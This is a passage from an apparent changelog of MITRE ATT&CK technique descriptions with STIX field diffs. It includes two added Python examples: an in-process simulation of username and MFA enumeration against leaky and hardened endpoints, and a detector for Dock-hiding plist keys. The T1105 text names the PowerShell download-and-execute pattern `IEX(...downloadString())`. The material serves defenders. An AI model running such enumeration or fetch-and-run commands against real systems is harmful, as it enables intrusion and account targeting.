Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

New Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-14 22:18:39.190000+00:00 | 2023-11-28 21:27:35.373000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.4 | 2.5

[T1090.002] Proxy: External Proxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.2.0
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-27 17:50:37.411000+00:00 | 2024-04-16 12:19:08.953000+00:00
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Network

[T1071.002] Application Layer Protocol: File Transfer Protocols

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

New Description
Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019), FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-01 02:42:15.473000+00:00 | 2024-01-18 17:23:22.591000+00:00
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'ESET Machete July 2019', 'description': 'ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.', 'url': 'https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf'}
external_references |  | {'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'}
x_mitre_platforms |  | Network

[T1083] File and Directory Discovery

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)

New Description
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A) Some files and directories may require elevated or specific user permissions to access.
Details
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_system_requirements | ['Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls'] | 
values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 21:01:42.631000+00:00 | 2024-04-16 12:40:10.978000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.5 | 1.6

[T1657] Financial Theft

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC) Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks) Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)

New Description
Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC) Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks) Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)
Details

values_changed
STIX Field | Old value | New Value
modified | 2023-09-30 19:54:11.916000+00:00 | 2024-04-11 20:22:14.359000+00:00
description | text under Old Description above | text under New Description above
x_mitre_version | 1.0 | 1.1

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Crowdstrike-leaks', 'description': 'Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.', 'url': 'https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/'}
x_mitre_contributors | | Goldstein Menachem

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)

New Description:
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.
Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False

dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |

values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 21:01:48.279000+00:00 | 2024-04-15 23:39:31.474000+00:00
description | text under Old Description above | text under New Description above
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

[T1589] Gather Victim Identity Information

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

New Description:
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
Details

values_changed
STIX Field | Old value | New Value
modified | 2022-04-21 14:39:39.857000+00:00 | 2024-04-19 04:27:00.005000+00:00
description | text under Old Description above | text under New Description above
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Obsidian SSPR Abuse 2023', 'description': 'Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.', 'url': 'https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/'}
x_mitre_contributors | | Obsidian Security
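
The new T1589 text adds that authentication services can reveal valid usernames and the MFA methods permitted for them. The following is an added example, not part of this changelog and not MITRE's code: it simulates, entirely in-process, a login endpoint and a self-service password reset (SSPR) step that leak identity information through response differences, the uniform-response versions of both, and the probing loop an adversary runs against them. The user directory, endpoint names, response bodies and the `_notify_enrolled_contact` hook are all constructed for the example.

```python
"""
Added example for the T1589 description above (not MITRE's code). Shows how
an authentication or SSPR front end leaks identity information through
distinct responses, and what the uniform-response fix looks like.
"""
import hashlib
import hmac
import secrets


def _h(password: str) -> bytes:
    return hashlib.sha256(password.encode()).digest()


# Constructed directory: username -> (password hash, permitted MFA methods)
USERS = {
    "alice": (_h("Winter2024!"), ["authenticator_app", "sms"]),
    "bob": (_h("hunter2"), ["sms"]),
}
# Compared against for unknown users so the work done is the same either way.
DUMMY_HASH = _h(secrets.token_hex(16))


def leaky_login(username: str, password: str) -> dict:
    """Vulnerable: the error text tells the caller whether the user exists."""
    if username not in USERS:
        return {"status": 401, "error": "invalid username"}
    if not hmac.compare_digest(USERS[username][0], _h(password)):
        return {"status": 401, "error": "invalid password"}
    return {"status": 200}


def uniform_login(username: str, password: str) -> dict:
    """Hardened: one message and one constant-time hash comparison whether or
    not the username exists."""
    stored, _ = USERS.get(username, (DUMMY_HASH, []))
    ok = hmac.compare_digest(stored, _h(password)) and username in USERS
    return {"status": 200} if ok else {"status": 401, "error": "invalid credentials"}


def leaky_sspr(username: str) -> dict:
    """Vulnerable SSPR step 1: confirms the account exists and lists its MFA
    methods before the caller has proven anything."""
    if username not in USERS:
        return {"status": 404, "error": "user not found"}
    return {"status": 200, "methods": USERS[username][1]}


def uniform_sspr(username: str) -> dict:
    """Hardened SSPR step 1: identical response for known and unknown users;
    the available methods go only to the enrolled contact, never to the
    caller. _notify_enrolled_contact is a hypothetical delivery hook."""
    if username in USERS:
        _notify_enrolled_contact(username)
    return {"status": 200, "message": "If the account exists, instructions have been sent"}


def _notify_enrolled_contact(username: str) -> None:
    pass  # stand-in for out-of-band SMS / email / push delivery


def enumerate_identities(endpoint, candidates) -> dict:
    """Adversary side of T1589: probe candidate usernames and keep those whose
    response differs from the response for a name that cannot exist.
    Returns {username: [MFA methods leaked, if any]}."""
    baseline = endpoint("nobody-" + secrets.token_hex(8))
    found = {}
    for name in candidates:
        resp = endpoint(name)
        if resp != baseline:
            found[name] = resp.get("methods", [])
    return found


if __name__ == "__main__":
    wordlist = ["alice", "bob", "carol"]
    print("leaky SSPR    :", enumerate_identities(leaky_sspr, wordlist))
    print("uniform SSPR  :", enumerate_identities(uniform_sspr, wordlist))
    print("leaky login   :", enumerate_identities(lambda u: leaky_login(u, "x"), wordlist))
    print("uniform login :", enumerate_identities(lambda u: uniform_login(u, "x"), wordlist))
```

Against the leaky endpoints the probe recovers both valid usernames and, for SSPR, each user's enrolled MFA methods; against the uniform endpoints every candidate looks like the baseline. The hardened login also hashes a dummy value for unknown users so that timing does not reintroduce the same distinction the error message used to give away.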

[T1564.003] Hide Artifacts: Hidden Window

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. On Windows, there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), JScript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is `powershell.exe -WindowStyle Hidden`.(Citation: PowerShell About 2019) Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be `apple.awt.UIElement`, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)

New Description:
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware) On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be `apple.awt.UIElement`, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), JScript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is `powershell.exe -WindowStyle Hidden`.(Citation: PowerShell About 2019) In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop with its own corresponding `explorer.exe` process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops.

New Mitigations:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False

dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |

values_changed
STIX Field | Old value | New Value
modified | 2022-03-15 21:09:43.489000+00:00 | 2024-04-13 14:28:20.651000+00:00
description | text under Old Description above | text under New Description above
x_mitre_version | 1.1 | 1.2

iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Hidden VNC', 'description': 'Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.', 'url': 'https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html'}
external_references | | {'source_name': 'Anatomy of an hVNC Attack', 'description': 'Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.', 'url': 'https://securityintelligence.com/anatomy-of-an-hvnc-attack/'}
x_mitre_contributors | | Mark Tsipershtein
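
The macOS part of the T1564.003 description names the `apple.awt.UIElement` plist property that keeps a Java application out of the Dock. The following is an added example, not part of this changelog and not MITRE's code: a check that walks an `Info.plist` (including the nested `Java/Properties` dictionary where that property lives) and reports every enabled Dock-hiding key, plus a scanner that applies it to every `.app` bundle under a directory. `LSUIElement` and `LSBackgroundOnly`, the general LaunchServices keys with the same effect, are included here on my own knowledge; the page does not mention them. The three plists in the block are constructed.

```python
"""
Added example for the macOS part of T1564.003 above (not MITRE's code):
report plist keys that keep an application out of the Dock.
"""
import os
import plistlib

# apple.awt.UIElement is the Java property named on the page; LSUIElement and
# LSBackgroundOnly are the LaunchServices equivalents (added here, not on the page).
HIDE_UI_KEYS = {"apple.awt.UIElement", "LSUIElement", "LSBackgroundOnly"}


def _walk(node, path=""):
    """Yield (key path, leaf value) for every leaf in a nested plist."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}/{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")
    else:
        yield path, node


def _is_enabled(value) -> bool:
    # Authors write these flags as <true/>, <string>true</string>,
    # <string>1</string> or <integer>1</integer>; treat all of them as set.
    if isinstance(value, bool):
        return value
    if isinstance(value, int):
        return value == 1
    if isinstance(value, str):
        return value.strip().lower() in {"1", "true", "yes"}
    return False


def hidden_ui_flags(plist_bytes: bytes) -> list:
    """Return [(key path, value)] for every Dock-hiding key that is enabled."""
    data = plistlib.loads(plist_bytes)
    return sorted(
        (path, value)
        for path, value in _walk(data)
        if path.rsplit("/", 1)[-1] in HIDE_UI_KEYS and _is_enabled(value)
    )


def scan_app_bundles(root: str) -> dict:
    """Apply hidden_ui_flags to every <name>.app/Contents/Info.plist under
    root (for example /Applications); returns {bundle path: flags} for hits."""
    hits = {}
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            if not d.endswith(".app"):
                continue
            info = os.path.join(dirpath, d, "Contents", "Info.plist")
            try:
                with open(info, "rb") as fh:
                    flags = hidden_ui_flags(fh.read())
            except (OSError, plistlib.InvalidFileException):
                continue
            if flags:
                hits[os.path.join(dirpath, d)] = flags
    return hits


_HEADER = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
           b'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
           b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n<plist version="1.0">\n')

# Constructed: a Java bundle hiding itself the way the description states.
JAVA_APP = _HEADER + b"""<dict>
  <key>CFBundleIdentifier</key><string>com.example.updater</string>
  <key>Java</key>
  <dict>
    <key>MainClass</key><string>com.example.Updater</string>
    <key>Properties</key>
    <dict><key>apple.awt.UIElement</key><string>true</string></dict>
  </dict>
</dict>
</plist>
"""
# Constructed: a native bundle using the LaunchServices equivalent.
NATIVE_APP = _HEADER + b"""<dict>
  <key>CFBundleIdentifier</key><string>com.example.helper</string>
  <key>LSUIElement</key><true/>
</dict>
</plist>
"""
# Constructed: an ordinary app that keeps its Dock icon.
NORMAL_APP = _HEADER + b"""<dict>
  <key>CFBundleIdentifier</key><string>com.example.editor</string>
  <key>LSUIElement</key><false/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for name, blob in [("java", JAVA_APP), ("native", NATIVE_APP), ("normal", NORMAL_APP)]:
        print(name, hidden_ui_flags(blob))
```

A hit is not a verdict: menu-bar utilities and background helpers legitimately set these keys, so the output is a list of bundles to compare against an allow-list, not an alert by itself.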

[T1564] Hide Artifacts

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details

dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False

values_changed
STIX Field | Old value | New Value
modified | 2022-03-25 15:59:09.632000+00:00 | 2024-03-29 17:45:48.126000+00:00
x_mitre_version | 1.1 | 1.2

[T1562.006] Impair Defenses: Indicator Blocking

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details

values_changed
STIX Field | Old value | New Value
modified | 2023-09-18 22:23:55.329000+00:00 | 2024-02-14 21:50:32.531000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4

iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Process: Process Creation

[T1105] Ingress Tool Transfer

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)

New Description:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms) Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
Details
values_changed
- modified: 2023-10-03 21:27:20.702000+00:00 → 2024-04-11 15:08:01.731000+00:00
- description (old): Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by 